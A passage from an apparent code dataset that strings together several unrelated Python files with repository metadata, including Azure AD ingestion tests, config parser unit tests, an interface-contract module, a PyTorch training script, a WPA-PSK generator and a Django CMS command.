"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": True,
"ingest_groups": True,
"ingest_users": True,
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_default_config.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_default_config.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_default_config.json",
)
@freeze_time(FROZEN_TIME)
def test_azure_source_ingestion_disabled(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
# Run an Azure usage ingestion run.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": "False",
"ingest_groups": "False",
"ingest_users": "False",
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_ingestion_disabled.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_ingestion_disabled.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_ingestion_disabled.json",
)
def load_test_resources(test_resources_dir):
azure_ad_users_json_file = test_resources_dir / "azure_ad_users.json"
azure_ad_groups_json_file = test_resources_dir / "azure_ad_groups.json"
with azure_ad_users_json_file.open() as azure_ad_users_json:
reference_users = json.loads(azure_ad_users_json.read())
with azure_ad_groups_json_file.open() as azure_ad_groups_json:
reference_groups = json.loads(azure_ad_groups_json.read())
return reference_users, reference_groups
def mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_groups_users
):
# mock token response
mock_token.return_value = "xxxxxxxx"
# mock users and groups response
users, groups = load_test_resources(test_resources_dir)
mock_users.return_value = iter(list([users]))
mock_groups.return_value = iter(list([groups]))
# For simplicity, each user is placed in ALL groups.
# Create a separate response mock for each group in our sample data.
r = []
for _ in groups:
r.append(users)
mock_groups_users.return_value = iter(r)
| 39.314721 | 123 | 0.629438 | 0 | 0 | 0 | 0 | 4,756 | 0.614074 | 0 | 0 | 3,193 | 0.412266 |
9085eea801b451acd44298bd5d756b5655efe26d | 138 | py | Python | edit/core/optimizer/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
]
| 28 | 2021-03-23T09:00:33.000Z | 2022-03-10T03:55:00.000Z | edit/core/optimizer/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
]
| 2 | 2021-04-17T20:08:55.000Z | 2022-02-01T17:48:55.000Z | edit/core/optimizer/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
]
| 5 | 2021-05-19T07:35:56.000Z | 2022-01-13T02:11:50.000Z | from .builder import build_optimizers, MGE_OPTIMIZERS, build_gradmanagers
from .default_constructor import DefaultOptimizerConstructor
| 23 | 73 | 0.876812 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
90861fa0047d98bc9b632e22782ae0a512bc70e6 | 561 | py | Python | hackerrank/medium/Climbing_the_Leaderboard.py | HoussemBousmaha/Competitive-Programming | c4530fc01d8933bdfefec7fb6d31cd648e760334 | [
"MIT"
]
| 6 | 2022-03-02T23:08:00.000Z | 2022-03-07T07:26:48.000Z | hackerrank/medium/Climbing_the_Leaderboard.py | HoussemBousmaha/Competitive-Programming | c4530fc01d8933bdfefec7fb6d31cd648e760334 | [
"MIT"
]
| null | null | null | hackerrank/medium/Climbing_the_Leaderboard.py | HoussemBousmaha/Competitive-Programming | c4530fc01d8933bdfefec7fb6d31cd648e760334 | [
"MIT"
]
| null | null | null | def climbingLeaderboard(ranked, player):
ranked = sorted(list(set(ranked)), reverse=True)
ranks = []
# print(ranked)
for i in range(len(player)):
bi = 0
bs = len(ranked) - 1
index = 0
while (bi <= bs):
mid = (bi+bs) // 2
if (ranked[mid] > player[i]):
index = mid
bi = mid + 1
else:
bs = mid - 1
if (ranked[index] > player[i]):
index += 1
index += 1
ranks.append(index)
return ranks
| 20.035714 | 52 | 0.43672 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.026738 |
908733eb70f6006bbe7cab4fd64970e3aec01842 | 8,352 | py | Python | src/python/config/parser/test_parsing.py | ncsa/NCSA-Genomics_MGC_GenomeGPS_CromwelWDL | 4611896ea1bb50df50120752712e8d4b32a6d023 | [
"MIT"
]
| null | null | null | src/python/config/parser/test_parsing.py | ncsa/NCSA-Genomics_MGC_GenomeGPS_CromwelWDL | 4611896ea1bb50df50120752712e8d4b32a6d023 | [
"MIT"
]
| null | null | null | src/python/config/parser/test_parsing.py | ncsa/NCSA-Genomics_MGC_GenomeGPS_CromwelWDL | 4611896ea1bb50df50120752712e8d4b32a6d023 | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import unittest
from config.parser.parsing import Parser
class TestParser(unittest.TestCase):
# Create an instance of the Parser class
parser_inst = Parser(job_id="NA")
# Turn the project logger off during UnitTesting, so the end user is not confused by error messages
# (Some tests are designed to fail, so they will log "ERROR" messages that are expected)
parser_inst.project_logger.logger.disabled = True
def test_remove_comments(self):
# Should remove comment lines
input_lines = ["# Comment line", " # Whitespace with comment", 'Key="Value"']
filtered_lines = Parser.remove_comments(input_lines)
self.assertEqual(filtered_lines, ['Key="Value"'])
def test_clean_input_file(self):
# Should remove blank and comment lines
input_lines = ["", "", "# Comment line", 'Key="Value"']
filtered_lines = Parser.clean_input_file(input_lines)
self.assertEqual(filtered_lines, ['Key="Value"'])
def test_create_key_value_pairs(self):
# Note: the second test case purposefully has an '=' in the value (the parser only assumes the key has no '=')
input_lines = ['Key1="Value1"', 'Key2="Value=2"']
expected_output = [('Key1', '"Value1"'), ('Key2', '"Value=2"')]
self.assertEqual(expected_output,
self.parser_inst.create_key_value_pairs(input_lines, "test_create_key_value_pairs")
)
def test_validate_key_value_pairs_pass(self):
'''
This test has no assert. The method being tested returns nothing, but throws errors if anything fails
This test should pass if the validate function can be called without throwing an error
'''
valid_tuple = [("keyA", '"valueA"')]
self.parser_inst.validate_key_value_pairs(valid_tuple, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_empty_value(self):
no_value_tuple = [("keyA", "")]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(no_value_tuple, file_path="dummy_file_path")
def test_validate_key_value_pairs_pass_empty_optional_key(self):
# InputRead2 is a key that is allowed to be empty (see src/config/util/special_keys.py)
nullable_key_empty_value = [("DebugMode", "")]
self.parser_inst.validate_key_value_pairs(nullable_key_empty_value, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_empty_non_optional_key(self):
# InputRead1 is a key that is not allowed to be empty (it must have a value)
key_empty_value = [("InputRead1", "")]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(key_empty_value, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_no_quotes(self):
no_value_tuple = [("keyA", 'Value without quotes')]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(no_value_tuple, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_special_characters(self):
no_value_tuple = [("keyA", '!@#$%&&^%(*&^%s')]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(no_value_tuple, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_duplicate_keys(self):
no_value_tuple = [("duplicateKey", 'valueA'), ("duplicateKey", "valueB")]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(no_value_tuple, file_path="dummy_file_path")
def test_insert_values_into_dict(self):
original_dict = {'major.minor.A': "init_A_value",
'major.minor.B': "init_B_value",
'major.minor.C': "init_C_value"
}
key_value_tuples = [('A', '"final_A_value"'), ("B", '"final_B_value"')]
substituted_dict = self.parser_inst.insert_values_into_dict(original_dict,
key_value_tuples,
"test_insert_values_into_dict"
)
# The final dictionary should have new values for A and B, which C's value unchanged
expected_dict = {'major.minor.A': "final_A_value",
'major.minor.B': "final_B_value",
'major.minor.C': "init_C_value"
}
self.assertEqual(expected_dict, substituted_dict)
def test_combine_input_read_arrays_paired_end_both(self):
key_value_tuples = [("PairedEnd", '"true"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '"readR1.fq,readR2.fq,readR3.fq"')
]
expected_paired_end_value = [["readL1.fq", "readR1.fq"], ["readL2.fq", "readR2.fq"], ["readL3.fq", "readR3.fq"]]
actual_paired_end_value = self.parser_inst.combine_input_read_arrays(key_value_tuples,
"NormalInputRead1",
"NormalInputRead2"
)
self.assertEqual(expected_paired_end_value, actual_paired_end_value)
def test_combine_input_read_arrays_paired_end_one(self):
key_value_tuples = [("PairedEnd", '"true"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '""')
]
with self.assertRaises(SystemExit):
# Should fail, as paired end is true but only one read set is provided
self.parser_inst.combine_input_read_arrays(key_value_tuples, "NormalInputRead1", "NormalInputRead2")
def test_combine_input_read_arrays_paired_end_unequal_lists(self):
key_value_tuples = [("PairedEnd", '"true"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '"readR1.fq"')
]
with self.assertRaises(SystemExit):
# Should fail, as paired end is true but only one read set is provided
self.parser_inst.combine_input_read_arrays(key_value_tuples, "NormalInputRead1", "NormalInputRead2")
def test_combine_input_read_arrays_single_end_both(self):
key_value_tuples = [("PairedEnd", '"false"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '"readR1.fq,readR2.fq,readR3.fq"')
]
expected_paired_end_value = [["readL1.fq"], ["readL2.fq"], ["readL3.fq"],
["readR1.fq"], ["readR2.fq"], ["readR3.fq"]]
actual_paired_end_value = self.parser_inst.combine_input_read_arrays(key_value_tuples,
"NormalInputRead1",
"NormalInputRead2"
)
self.assertEqual(expected_paired_end_value, actual_paired_end_value)
def test_combine_input_read_arrays_single_end_one(self):
key_value_tuples = [("PairedEnd", '"false"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '""')
]
expected_paired_end_value = [["readL1.fq"], ["readL2.fq"], ["readL3.fq"]]
actual_paired_end_value = self.parser_inst.combine_input_read_arrays(key_value_tuples,
"NormalInputRead1",
"NormalInputRead2"
)
self.assertEqual(expected_paired_end_value, actual_paired_end_value)
| 53.538462 | 120 | 0.578544 | 8,265 | 0.989583 | 0 | 0 | 0 | 0 | 0 | 0 | 2,640 | 0.316092 |
9088061118cf617385915ed728847f4d1b206103 | 862 | py | Python | scripts/aggregate_membership.py | LibrariesHacked/wuthering-hacks | c8e87dda86b05aaf9c23a5606472dc72c0aff603 | [
"CC0-1.0",
"MIT"
]
| 5 | 2016-10-02T13:49:29.000Z | 2020-02-12T00:09:14.000Z | scripts/aggregate_membership.py | LibrariesHacked/wuthering-hacks | c8e87dda86b05aaf9c23a5606472dc72c0aff603 | [
"CC0-1.0",
"MIT"
]
| null | null | null | scripts/aggregate_membership.py | LibrariesHacked/wuthering-hacks | c8e87dda86b05aaf9c23a5606472dc72c0aff603 | [
"CC0-1.0",
"MIT"
]
| null | null | null | ## Requires Python v3 and pandas (pip install pandas)
## This script takes the newcastle membership csv and attempts
## to reduce the file size as much as possible through aggregation and lookups
## Two lookup files to provide library names and dates are also created.
import csv
import os
import re
from datetime import datetime
import pandas
MEMBERDATA = '..\\data\\dashboard_newcastle_members.csv'
def read_member_data():
member_data_frame = pandas.DataFrame(
pandas.read_csv(open(os.path.join(os.path.dirname(__file__), MEMBERDATA), 'r')), index=None)
return member_data_frame
def run():
members = read_member_data()
postcodes = members['Postcode'].unique()
libraries = members['Library Registered At'].unique()
dates_added = members['Date Added'].unique()
times_added = members['Date Added'].unique()
run() | 30.785714 | 100 | 0.732019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 368 | 0.426914 |
9088b5572da41984c1697dbaf7d670a85f1c124c | 10,535 | py | Python | mdl/contracts/contract.py | fafhrd91/mdl | daada030649305df02f65b77ebdf41cf976a870e | [
"Apache-2.0"
]
| 3 | 2016-12-28T09:31:27.000Z | 2017-01-09T18:38:46.000Z | mdl/contracts/contract.py | fafhrd91/mdl | daada030649305df02f65b77ebdf41cf976a870e | [
"Apache-2.0"
]
| 1 | 2019-05-04T18:14:24.000Z | 2019-05-04T18:14:24.000Z | mdl/contracts/contract.py | fafhrd91/mdl | daada030649305df02f65b77ebdf41cf976a870e | [
"Apache-2.0"
]
| null | null | null | """Interface contract object"""
from __future__ import absolute_import
import six
import sys
import logging
from contracts.interface import ContractException, ContractNotRespected
from .extension import ID
from ..declarations import implementer
from ..verify import verifyObject
from ..interface import InterfaceClass
__all__ = (
'InterfaceContract', 'MethodContract',
'AttributeContract', 'ContractNotRespected')
class InterfaceContract(object):
def __init__(self, iface, contracts, adapter=None):
self.iface = iface
self.elements = {}
self.adapter = adapter
for elem in contracts:
self.elements[elem.name] = elem
self._cls = construct_class(iface, self.elements)
def verify(self, ob):
"""Raise exception if ob does not implement interface"""
verifyObject(self.iface, ob)
def bind(self, ob, verify=True, logger=None):
if verify:
self.verify(ob)
if logger is None:
logger = logging
return self._cls(ob, logger)
def bind_adapter(self, factory, logger=None):
if logger is None:
logger = logging
if self.adapter is not None:
return BoundAdapterContract(factory, self.adapter, logger)
return factory
class AdapterContract(object):
def __init__(self, iface, args, exceptions):
self.name = iface.__name__
self.iface = iface
self.args = args
self.exceptions = exceptions
def _check_args_contract(self, adapter, ob, args, kwargs):
bound = self.getcallargs(*args, **kwargs)
for arg, contract in self.args_contract.items():
context = {'self': ob}
try:
contract._check_contract(context, bound[arg], silent=True)
except ContractNotRespected as e:
msg = 'Breach for argument %r to %s:%s(...)\n' % (
arg, self.iface.__name__, self.name)
e.error = msg + e.error
raise e
def __call__(self, factory, logger, *args, **kwargs):
# self._check_args_contract(ob, args, kwargs)
try:
result = factory(*args, **kwargs)
except:
exc_type, exc_value, exc_tb = sys.exc_info()
# check exception contract
context = {'factory': factory}
for contract in self.exceptions:
try:
contract._check_contract(context, exc_value, silent=True)
except ContractNotRespected:
continue
else:
break
else:
# log un-defined exception
logger.error(
'Un-defined exception received from %s.%s(...)' % (
self.iface.__name__, self.name),
exc_info=(exc_type, exc_value, exc_tb))
six.reraise(exc_type, exc_value, exc_tb)
if not self.iface.providedBy(result):
raise ContractException(
'interface %s is not provided by adapted object %s' % (
self.name, result))
return result
class BoundAdapterContract(object):
def __init__(self, factory, contract, logger):
self.factory = factory
self.contract = contract
self.logger = logger
def __call__(self, *args, **kwargs):
return self.contract(self.factory, self.logger, *args, **kwargs)
class AttributeContract(object):
def __init__(self, iface, attr, contract):
self.name = attr.__name__
self.iface = iface
self.attr = attr
self.contract = contract
def check_value(self, ob, value):
context = {'self': ob}
try:
self.contract._check_contract(context, value, silent=True)
except ContractNotRespected as e:
msg = 'Breach for attribute value of %s.%s\n' % (
self.iface.__name__, self.name)
e.error = msg + e.error
raise e
type_ob = context.get(ID)
if (type_ob is not None and
not isinstance(value, BoundInterfaceContract) and
isinstance(type_ob, InterfaceClass)):
return type_ob.contract(value)
return value
class MethodContract(object):
def __init__(self, iface, method,
args_contract, result_contract, exceptions):
self.name = method.__name__
self.iface = iface
self.method = method
self.args_contract = args_contract
self.result_contract = result_contract
self.exceptions = exceptions
def _check_args_contract(self, ob, args, kwargs):
bound = self.getcallargs(*args, **kwargs)
for arg, contract in self.args_contract.items():
context = {'self': ob}
try:
contract._check_contract(context, bound[arg], silent=True)
except ContractNotRespected as e:
msg = 'Breach for argument %r to %s:%s(...)\n' % (
arg, self.iface.__name__, self.name)
e.error = msg + e.error
raise e
def _check_result_contract(self, ob, result):
context = {'self': ob}
try:
self.result_contract._check_contract(context, result, silent=False)
except ContractNotRespected as e:
msg = 'Breach for return value of %s.%s(...)\n' % (
self.iface.__name__, self.name)
e.error = msg + e.error
raise e
type_ob = context.get(ID)
if (type_ob is not None and
not isinstance(result, BoundInterfaceContract) and
isinstance(type_ob, InterfaceClass)):
return type_ob.contract(result)
return result
def __call__(self, ob, logger, *args, **kwargs):
self._check_args_contract(ob, args, kwargs)
try:
result = getattr(ob, self.name)(*args, **kwargs)
except:
exc_type, exc_value, exc_tb = sys.exc_info()
# check exception contract
context = {'self': ob}
for contract in self.exceptions:
try:
contract._check_contract(context, exc_value, silent=True)
except ContractNotRespected:
continue
else:
break
else:
# log un-defined exception
logger.exception(
'Un-defined exception received from %s.%s(...)' % (
self.iface.__name__, self.name),
exc_info=(exc_type, exc_value, exc_tb))
six.reraise(exc_type, exc_value, exc_tb)
if self.result_contract is not None:
result = self._check_result_contract(ob, result)
return result
def getcallargs(self, *positional, **named):
"""Get the mapping of arguments to values."""
arg2value = {}
args = self.method.positional
num_pos = len(positional)
num_total = num_pos + len(named)
num_args = len(args)
for arg, value in zip(args, positional):
arg2value[arg] = value
defaults = self.method.optional
if 0 < num_args < num_pos:
raise TypeError('%s() takes %s %d %s (%d given)' % (
self.name, 'at most' if defaults else 'exactly', num_args,
'arguments' if num_args > 1 else 'argument', num_total))
elif num_args == 0 and num_total:
raise TypeError(
'%s() takes no arguments (%d given)' % (self.name, num_total))
for arg in args:
if isinstance(arg, str) and arg in named:
if arg in arg2value:
raise TypeError(
"%s() got multiple values for keyword "
"argument '%s'" % (self.name, arg))
else:
arg2value[arg] = named.pop(arg)
if defaults: # fill in any missing values with the defaults
for arg, value in defaults.items():
if arg not in arg2value:
arg2value[arg] = value
if named:
unexpected = next(iter(named))
raise TypeError(
"%s() got an unexpected keyword argument '%s'" %
(self.name, unexpected))
unassigned = num_args - len([arg for arg in args if arg in arg2value])
if unassigned:
num_required = num_args - len(defaults)
raise TypeError('%s() takes %s %d %s (%d given)' % (
self.name, 'at least' if defaults else 'exactly', num_required,
'arguments' if num_required > 1 else 'argument', num_total))
return arg2value
class AttributeDescriptor(object):
""" The AttributeDescriptor serves as a wrapper
for interface's attributes """
def __init__(self, attr):
self.attr = attr
self.name = attr.name
def __get__(self, instance, cls):
ob = instance.__context__
value = getattr(ob, self.name)
return self.attr.check_value(ob, value)
def __set__(self, instance, value):
ob = instance.__context__
self.attr.check_value(ob, value)
# extract original object
if isinstance(value, BoundInterfaceContract):
value = value.__context__
setattr(ob, self.name, value)
class BoundInterfaceContract(object):
def __init__(self, context, logger):
self.__context__ = context
self.__logger__ = logger
def __setattr__(self, name, value):
if name in self.__slots__:
super(BoundInterfaceContract, self).__setattr__(name, value)
else:
raise AttributeError(name)
def method_wrapper(element):
def func(self, *args, **kwargs):
return element(self.__context__, self.__logger__, *args, **kwargs)
return func
def construct_class(iface, elements):
attrs = {'__module__': iface.__module__}
slots = {'__context__', '__logger__'}
for name, element in elements.items():
slots.add(name)
if isinstance(element, AttributeContract):
attrs[name] = AttributeDescriptor(element)
else:
attrs[name] = method_wrapper(element)
name = '%sBoundContract' % iface.__name__
cls = type(name, (BoundInterfaceContract,), attrs)
cls.__slots__ = tuple(slots)
return implementer(iface)(cls)
| 31.541916 | 79 | 0.57608 | 9,394 | 0.891694 | 0 | 0 | 0 | 0 | 0 | 0 | 1,191 | 0.113052 |
908923bb1a1d3dddbedc40a59f1c9790842c688e | 3,979 | py | Python | hourglass/train.py | ziqi123/AutoParking | bc2c86fe93892c0502cc7cf689d8ec072d2974d1 | [
"Apache-2.0"
]
| null | null | null | hourglass/train.py | ziqi123/AutoParking | bc2c86fe93892c0502cc7cf689d8ec072d2974d1 | [
"Apache-2.0"
]
| null | null | null | hourglass/train.py | ziqi123/AutoParking | bc2c86fe93892c0502cc7cf689d8ec072d2974d1 | [
"Apache-2.0"
]
| null | null | null | import numpy as np
import torch
import torchvision.transforms as transforms
from dataloader.dataloader_hourglass import heatmap_Dataloader
import os
from network import KFSGNet
import torchvision.transforms as transforms
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
# Device configuration
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
num_epochs = 200
learning_rate = 0.001
transform = transforms.Compose([
transforms.ToTensor()])
params = dict()
params['data_normalize_factor'] = 256
params['dataset_dir'] = "./"
params['rgb2gray'] = False
params['dataset'] = "heatmap_dataset_all"
params['train_batch_sz'] = 16
params['val_batch_sz'] = 1
params['sigma'] = 3
dataloaders, dataset_sizes = heatmap_Dataloader(params)
train_loader = dataloaders['train']
test_loader = dataloaders['val']
# Define your model
model = KFSGNet()
# model.load_state_dict(torch.load(
# '/media/home_bak/ziqi/park/hourglass/10heatmap5.ckpt'))
# move model to the right device
model.to(device)
model.train()
# Loss and optimizer
loss_fn = torch.nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# 多步长学习率衰减
# 不同的区间采用不同的更新频率,或者是有的区间更新学习率,有的区间不更新学习率
# 其中milestones参数为表示学习率更新的起止区间,在区间[0. 200]内学习率不更新,
# 而在[200, 300]、[300, 320].....[340, 400]的右侧值都进行一次更新;
# gamma参数表示学习率衰减为上次的gamma分之一
# torch.optim.lr_scheduler.MultiStepLR(optimizer,
# milestones=[30, 60, 80, 100, 120, 140], gamma=0.5)
print(optimizer.state_dict()['param_groups'][0]['lr'])
# For updating learning rate
# Train the model
total_step = len(train_loader)
curr_lr = learning_rate
print("start")
def calculate_mask(heatmaps_target):
"""
:param heatmaps_target: Variable (N,15,96,96)
:return: Variable (N,15,96,96)
"""
N, C, _, _ = heatmaps_targets.size()
N_idx = []
C_idx = []
for n in range(N):
for c in range(C):
max_v = heatmaps_targets[n, c, :, :].max().data
if max_v != 0.0:
N_idx.append(n)
C_idx.append(c)
mask = torch.zeros(heatmaps_targets.size())
mask[N_idx, C_idx, :, :] = 1.
mask = mask.float().cuda()
return mask, [N_idx, C_idx]
# def MSE(y_pred, gt):
# loss = 0
# loss += 0.5 * np.sum((y_pred - gt)**2)
# vec_gt = [[0]*3] * 5
# for w in range(4):
# vec_gt[w] = np.array([gt[w][0],
# gt[w][1]])
# vector_gt = vec_gt[1]-vec_gt[0]
# vec_pred = [[0]*3] * 5
# for v in range(4):
# vec_pred[w] = np.array([y_pred[w][0],
# y_pred[w][1]])
# vector_pred = vec_pred[1]-vec_pred[0]
# loss += (vector_gt[0]*vector_pred[1]-vector_pred[0]*vector_gt[1])**0.5
for epoch in range(num_epochs):
tmp = 0
for i, (data, gt, mask, item, imgPath, heatmaps_targets) in enumerate(train_loader):
# print(i)
data = data.to(device)
gt = gt.to(device)
mask = mask.to(device)
gt = gt.view(-1, 8)
heatmaps_targets = heatmaps_targets.to(device)
mask, indices_valid = calculate_mask(heatmaps_targets)
# print(heatmaps_targets.shape)
# Forward pass
outputs = model(data)
outputs = outputs * mask
heatmaps_targets = heatmaps_targets * mask
# print(outputs.shape)
loss = loss_fn(outputs, heatmaps_targets)
tmp += loss.item()
# exit()
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if i % 10 == 0:
print("Epoch [{}/{}], Step [{}/{}] Loss: {:.4f}, average_loss: {:.4f}, learning_rate: {}".format(
epoch + 1, num_epochs, i + 1, total_step, loss.item(), tmp / (i+1), optimizer.state_dict()['param_groups'][0]['lr']))
if (epoch + 1) % 10 == 0:
torch.save(model.state_dict(), '{}heatmap4.ckpt'.format(epoch + 1))
# card2 heatmap 26688
# card0 heatmap2 29009
| 27.631944 | 133 | 0.619754 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,853 | 0.442138 |
9089cafc79c7a1e8e0abc38c3cabc190f618f305 | 1,648 | py | Python | wpa-psk/wpa-psk.py | ranisalt/rsaur | 8b8e8f596a35e8aff53ccff0fc941deacdc885a4 | [
"MIT"
]
| null | null | null | wpa-psk/wpa-psk.py | ranisalt/rsaur | 8b8e8f596a35e8aff53ccff0fc941deacdc885a4 | [
"MIT"
]
| null | null | null | wpa-psk/wpa-psk.py | ranisalt/rsaur | 8b8e8f596a35e8aff53ccff0fc941deacdc885a4 | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import sys
from argparse import ArgumentParser
from getpass import getpass
from hashlib import pbkdf2_hmac
from signal import signal, SIGINT
def die(*_, **__):
sys.exit()
signal = signal(SIGINT, die)
iwd = """[Security]
PreSharedKey={psk}"""
supplicant = """network={{
ssid={ssid}
#psk={passphrase}
psk={psk}
}}"""
parser = ArgumentParser(
description="%(prog)s pre-computes PSK entries for network configuration blocks of wpa_supplicant or iwd config. An ASCII passphrase and SSID are used to generate a 256-bit PSK."
)
parser.add_argument("ssid", help="The SSID whose passphrase should be derived.")
parser.add_argument(
"passphrase",
help="The passphrase to use. If not included on the command line, passphrase will be read from standard input.",
nargs="?",
)
parser.add_argument(
"--iwd",
"-i",
dest="template",
action="store_const",
const=iwd,
default=supplicant,
help="Generate for iwd (default: generate for wpa_supplicant).",
)
args = parser.parse_args()
if not args.passphrase:
print("# reading passphrase from stdin", file=sys.stderr)
args.passphrase = getpass(prompt="")
if not 8 <= len(args.passphrase) <= 63:
print("Passphrase must be 8..63 characters", file=sys.stderr)
sys.exit(1)
passphrase = args.passphrase.encode()
if any(b < 32 or b == 127 for b in passphrase):
print("Invalid passphrase character", file=sys.stderr)
sys.exit(1)
ssid = args.ssid.encode()
psk = pbkdf2_hmac("sha1", passphrase, ssid, iterations=4096, dklen=32)
print(args.template.format(ssid=args.ssid, passphrase=args.passphrase, psk=psk.hex()))
| 28.912281 | 182 | 0.703277 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 667 | 0.404733 |
908ab1d5d4950850ce0d224a0c7fe40fe59aa364 | 2,406 | py | Python | cms/management/commands/subcommands/copy_lang.py | mightyiam/django-cms | 09bf76d2f3d81fdaebcfb7e9ed4ecd4769fa8c25 | [
"BSD-3-Clause"
]
| 2 | 2018-05-17T02:49:49.000Z | 2019-08-20T02:07:44.000Z | cms/management/commands/subcommands/copy_lang.py | mightyiam/django-cms | 09bf76d2f3d81fdaebcfb7e9ed4ecd4769fa8c25 | [
"BSD-3-Clause"
]
| 2 | 2019-02-13T07:58:23.000Z | 2019-02-13T07:58:27.000Z | cms/management/commands/subcommands/copy_lang.py | mightyiam/django-cms | 09bf76d2f3d81fdaebcfb7e9ed4ecd4769fa8c25 | [
"BSD-3-Clause"
]
| null | null | null | # -*- coding: utf-8 -*-
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from cms.api import copy_plugins_to_language
from cms.models import Title, Page
from cms.utils.i18n import get_language_list
class CopyLangCommand(BaseCommand):
args = '<language_from language_to>'
help = u'duplicate the cms content from one lang to another (to boot a new lang) using draft pages'
def handle(self, *args, **kwargs):
verbose = 'verbose' in args
only_empty = 'force-copy' not in args
site = [arg.split("=")[1] for arg in args if arg.startswith("site")]
if site:
site = site.pop()
else:
site = settings.SITE_ID
#test both langs
try:
assert len(args) >= 2
from_lang = args[0]
to_lang = args[1]
assert from_lang != to_lang
except AssertionError:
raise CommandError("Error: bad arguments -- Usage: manage.py cms copy-lang <lang_from> <lang_to>")
try:
assert from_lang in get_language_list(site)
assert to_lang in get_language_list(site)
except AssertionError:
raise CommandError("Both languages have to be present in settings.LANGUAGES and settings.CMS_LANGUAGES")
for page in Page.objects.on_site(site).drafts():
# copy title
if from_lang in page.get_languages():
try:
title = page.get_title_obj(to_lang, fallback=False)
except Title.DoesNotExist:
title = page.get_title_obj(from_lang)
if verbose:
self.stdout.write('copying title %s from language %s\n' % (title.title, from_lang))
title.id = None
title.language = to_lang
title.save()
# copy plugins using API
if verbose:
self.stdout.write('copying plugins for %s from %s\n' % (page.get_page_title(from_lang), from_lang))
copy_plugins_to_language(page, from_lang, to_lang, only_empty)
else:
if verbose:
self.stdout.write('Skipping page %s, language %s not defined\n' % (page, from_lang))
self.stdout.write(u"all done")
| 37.59375 | 119 | 0.588944 | 2,119 | 0.880715 | 0 | 0 | 0 | 0 | 0 | 0 | 515 | 0.214048 |
908b0f1eabec4449e380288689a4979deb9e601d | 424 | py | Python | easyml/mainsite/migrations/0015_auto_20181014_1837.py | evancasey1/EasyML | 69f0c246cb7e1d6f7167eb504c30693088e703fd | [
"MIT"
]
| null | null | null | easyml/mainsite/migrations/0015_auto_20181014_1837.py | evancasey1/EasyML | 69f0c246cb7e1d6f7167eb504c30693088e703fd | [
"MIT"
]
